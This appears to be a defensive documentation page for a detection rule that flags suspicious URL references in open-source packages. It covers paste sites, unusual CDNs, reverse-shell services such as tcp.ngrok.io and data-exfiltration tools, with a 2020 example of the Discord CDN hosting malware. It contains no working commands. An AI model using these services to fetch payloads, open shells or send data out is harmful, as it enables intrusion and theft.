Suspicious URL References

Description

There are some widely used URLs that, on their own, aren't necessarily malicious but when referenced or used in the context of open source software should be treated with suspicion and scrutiny.

Paste Tools

Paste tools like Pastebin.com are online content-hosting services where users can store plain text like source code snippets. It's possible for attackers to host malicious code on these sites and then simply pull it down and execute from any other code.

Web Application Security Testing Tools

When testing web application security, it's sometimes necessary to reach out to a remote server to detect what security vulnerabilities might be present on the system. Finding references to these servers could indicate that an attacker may be looking for vulnerabilities in an effort to later exploit.

Unusual CDNs (Content Delivery Networks)

CDNs, or content delivery networks, are effectively a form of cloud-based storage. An attacker can reach out to a CDN to pull down any desired file and execute it.

Obfuscation Tools

These are tools used to obfuscate code making it harder for a user of the library to understand what the code is doing.

Reverse Shells

A reverse shell allows an attacker to initiate a shell session on the victim's computer. Some recent malware has been observed using web-based tools such as tcp.ngrok.io to establish reverse shells.

Data Exfiltration Tools

Data exfiltration tools allow an attacker to easily push data from a compromised machine to a site from which they can later access and retrieve that information.

Importance

As mentioned previously, the types of sites shown above might not necessarily be malicious on their own, but when they are referenced in open source software, the user of that software should be made aware of their use in order to determine whether or not that site is being used with malicious intent or not.

Examples

During the course of 2020, it was found that the Discord CDN was used to host all kinds of malicious software such as Epsilon ransomware, Redline stealer, and the XMRig cryptocurrency miner.